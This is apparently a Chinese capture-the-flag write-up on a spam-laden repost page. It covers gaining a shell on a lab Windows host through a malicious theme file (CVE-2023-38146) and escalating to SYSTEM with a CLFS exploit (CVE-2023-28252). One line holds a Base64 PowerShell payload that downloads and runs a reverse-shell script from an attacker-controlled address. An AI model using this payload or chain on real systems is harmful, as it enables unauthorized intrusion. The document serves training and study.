当前位置: 首页 > wzjs >正文

手机网站分享最火的网页游戏

手机网站分享,最火的网页游戏,织梦网站怎么重新安装教程,金华网站定制公司一、初步侦察与立足点获取 1.1 端口扫描与服务识别 首先进行端口扫描。扫描结果显示,目标主机仅开放了 80 端口,运行一个 Web 服务。 sudo nmap 10.10.11.237 -p- --min-rate5000 -A1.2 Web 应用分析与功能点识别 访问该 Web 服务。经过初步浏览&…

在这里插入图片描述

一、初步侦察与立足点获取

1.1 端口扫描与服务识别

首先进行端口扫描。扫描结果显示,目标主机仅开放了 80 端口,运行一个 Web 服务。

sudo nmap 10.10.11.237 -p- --min-rate=5000 -A

1.2 Web 应用分析与功能点识别

访问该 Web 服务。经过初步浏览,发现该网站提供了一个功能:允许用户上传 Windows 主题文件,并提示后续会有人审查和使用这些主题。

尝试进行目录爆破,但未发现有价值的路径或文件。

dirsearch -u http://10.10.11.237

为确保全面,也对 UDP 端口进行了探测,确认仅有 TCP 80 端口对外开放。因此,攻击的焦点自然落在了这个主题文件上传功能上。

1.3 漏洞研究:Windows 主题 RCE (CVE-2023-38146)

我们开始思考:如果上传一个恶意文件,它应该是什么类型?又该如何被服务器解析并利用呢?

针对 Windows 主题文件上传功能,经过一番搜索,找到了一个相关的远程代码执行漏洞:CVE-2023-38146。该漏洞影响 Windows 11 主题处理机制,允许通过特制的恶意主题文件执行任意命令。

1.4 漏洞利用与初始访问获取

根据公开的 PoC,构造一个恶意的 .theme 文件并进行上传。

同时,在本地设置好监听器。上传恶意主题文件后,稍等片刻便成功接收到目标主机的回连。获取到的用户权限为 sam.emerson。立即检查用户特权,未发现可直接利用的高权限。

二、权限提升

2.1 信息搜集:发现提权线索 (CVE-2023-28252)

获得初始访问权限后,首要任务是进行信息搜集。很快就在 sam.emerson 用户的 Documents 目录中,发现了一个 PDF 文档,其内容是关于 CVE-2023-28252 漏洞的修复提醒。

2.2 漏洞研究:Windows CLFS 本地提权 (CVE-2023-28252)

网上搜索发现这是一个 Windows 本地提权漏洞,这几乎算是明示系统存在该漏洞了吧。当然也不一定,可能是故意在这里误导我们。总之在 github 上找到了一个编译好的提权程序,先尝试一下。

2.3 漏洞利用与 SYSTEM 权限获取

将下载的提权程序 (例如 clfs_eop.exe) 上传到目标机器。首先,尝试执行一个简单的 whoami 命令来验证漏洞利用效果:

.\clfs_eop.exe whoami

命令成功以 SYSTEM 权限执行,确认了漏洞的存在和利用程序的有效性。

既然漏洞验证成功,接下来便利用此权限执行一个反弹 shell 的 PowerShell payload,以获取一个稳定的 SYSTEM 权限会话。Payload 经过 Base64 编码 (UTF-16LE):

.\clfs_eop.exe 'powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADEANwAvAHIAZQB2AC4AcABzADEAJwApAA=='

本地监听器成功接收到回连,当前用户已是 NT AUTHORITY\SYSTEM,成功提权。



文章转载自:

http://cKeJLwJl.nwfpL.cn
http://t473P3ux.nwfpL.cn
http://OrPro3UH.nwfpL.cn
http://1ElVzEbi.nwfpL.cn
http://Ec5kwct0.nwfpL.cn
http://Mo1XWKrK.nwfpL.cn
http://hlHfWacZ.nwfpL.cn
http://0SuQjxB4.nwfpL.cn
http://nPATbVav.nwfpL.cn
http://DaHfm6Cu.nwfpL.cn
http://tiV74Taf.nwfpL.cn
http://yABtogjq.nwfpL.cn
http://Ld00W9at.nwfpL.cn
http://rrvFVg4N.nwfpL.cn
http://TQ6Rkpqy.nwfpL.cn
http://Qkh3Dkcp.nwfpL.cn
http://rjUm7rjC.nwfpL.cn
http://zaX9nA9s.nwfpL.cn
http://H4UUlMVj.nwfpL.cn
http://Uz1zZKLq.nwfpL.cn
http://Yt62i8an.nwfpL.cn
http://XCm8HtX7.nwfpL.cn
http://Q2sUc9IW.nwfpL.cn
http://6ZT6AQ3o.nwfpL.cn
http://Nk1PJU6X.nwfpL.cn
http://ECC8UoXA.nwfpL.cn
http://9UYlKTim.nwfpL.cn
http://MdzKYQFi.nwfpL.cn
http://Hm4nXKfu.nwfpL.cn
http://XWQVY7js.nwfpL.cn
http://www.dtcms.com/wzjs/722181.html

相关文章:

  • 茂名做网站公司c2c平台是指什么
  • 织梦网站后台默认登陆路径长春市供求世界在线看报
  • vue网站开发注意事项湖南seo优化服务
  • 做网站建设与推广企业网站设计 深圳
  • 网站查icp备案查询系统创客联盟网站建设
  • 图书类网站建设策划书wordpress基本设置
  • 织梦如何做视频网站做动画片的网站
  • 陕西网站关键词自然排名优化淘宝上做网站的信得过吗
  • 庐阳网站快速排名网站文章百度快照怎么做
  • 卖线面网站上海人才招聘信息最新招聘信息
  • 标准网站建设费用深圳互联网营销
  • 企业网站模板phpjoomla 网站建设教程
  • 柳州正规网站建设招商重庆百度竞价托管
  • 茶叶价格网站建设河南工程建设信息网官网 可登录中项网
  • 该如何选择深圳网站建设公司网站转wordpress
  • 免费建设互动的网站网站流量所需的成本.
  • 用什么网站推广比较大气的网站
  • 做网站每天任务及实训过程计算机应用技术ui设计是什么
  • 盛泽做网站的价格低配置高的手机
  • 西双版纳网站建设开发公司锦溪网站建设
  • php网站开发实例宝塔面板wordpress备份恢复
  • 广德网站建设自己做外贸自己做网站
  • 建筑公司网站模板免费下载公司网站建设费会计分录
  • 济南 制作网站 公司哪家好wordpress m3u8
  • 南京响应式网站建设网站的建设原始代码
  • 做婚庆找什么网站网站多条件筛选 html
  • 商务网站建设与维护考试花店网站建设环境分析
  • 三d全景网站建设四川省商投建设公司官网
  • 做网站 图片 文件夹 放哪儿专门做lolh的网站
  • 外贸生意怎么入手南昌seo网络